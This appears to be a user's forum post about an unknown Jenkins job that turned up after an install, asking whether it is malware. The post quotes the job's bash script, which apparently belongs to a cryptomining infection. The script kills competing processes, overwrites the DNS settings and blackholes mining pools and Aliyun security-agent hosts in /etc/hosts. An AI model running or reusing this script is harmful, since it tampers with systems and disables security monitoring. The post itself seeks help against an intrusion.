We just installed Jenkins 2.240 and suddenly there is a job with some really strange content, including:
#!/bin/bash
threadCount=$(lscpu | grep 'CPU(s)' | grep -v ',' | awk '{print $2}' | head -n 1);
hostHash=$(hostname -f | md5sum | cut -c1-8);
echo "${hostHash} - ${threadCount}";
ktr () {
killall trace;pkill -9 -f trace;killall -s SIGKILL trace
killall vunix;pkill -9 -f vunix;killall -s SIGKILL vunix
killall viunix;pkill viunix;killall -s SIGKILL viunix
kill -9 $(ps -ux | grep trace | awk '{ print $2 }')
kill -9 $(ps -ux | grep vunix | awk '{ print $2 }')
kill -9 $(ps -ux | grep viunix | awk '{ print $2 }')
echo kill
}
ktr
ktr
ktr
echo plsfoodforcatsnlove
echo 'nameserver 1.1.1.1' > /etc/resolv.conf;echo 'nameserver 8.8.8.8' >> /etc/resolv.conf;echo 'nameserver 180.76.76.76' >> /etc/resolv.conf
echo "0.0.0.0
blockchain.info" >> /etc/hosts;echo "0.0.0.0 35.225.36.167" >> /etc/hosts;echo "0.0.0.0 100.100.25.3
jsrv.aegis.aliyun.com" >> /etc/hosts
echo "0.0.0.0 100.100.25.4
update.aegis.aliyun.co" >> /etc/hosts;echo "0.0.0.0 185.164.72.119" >> /etc/hosts;echo "0.0.0.0 163.172.191.181" >> /etc/hosts
echo "0.0.0.0
pool.supportxmr.com" >> /etc/hosts;echo "0.0.0.0 pinto.mamointernet.icu" >> /etc/hosts;echo "0.0.0.0
sdk.bce.baidu.com" >> /etc/hosts
echo "0.0.0.0
lsd.systemten.org" >> /etc/hosts;
echo "0.0.0.0
pool.minexmr.com" >> /etc/hosts
echo "0.0.0.0
minexmr.com" >> /etc/hosts
This is really creepy because this script cannot possibly run on our system (the good part). The bad part is that no one in our organization created this job. Is it possible that there is some malware floating around? Our Jenkins instance is hiding behind a firewall so there's no way in.